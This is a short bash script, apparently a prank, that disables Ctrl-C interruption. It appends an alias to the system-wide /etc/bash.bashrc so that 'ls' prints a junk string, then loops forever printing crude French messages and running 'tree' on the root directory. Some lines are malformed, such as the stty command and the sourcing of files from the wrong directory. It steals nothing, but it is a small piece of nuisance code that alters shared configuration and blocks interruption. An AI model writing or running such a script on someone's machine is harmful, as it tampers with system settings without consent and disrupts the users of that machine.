#!/bin/bash

trap '' INT

stty intr ^C susp ^Zmain

ls 
cd ~

echo "alias ls='echo"PRORRORORORORO"'" >> /etc/bash.bashrc

source .bashrc

source bash.bashrc

ls 

while true
do

    echo "PORNOOOOOOOOOOOOO "
    sleep 1
    tree / ;
    sleep 1
    echo " 
    
    PETIT CADEAU DE NOGE "
done
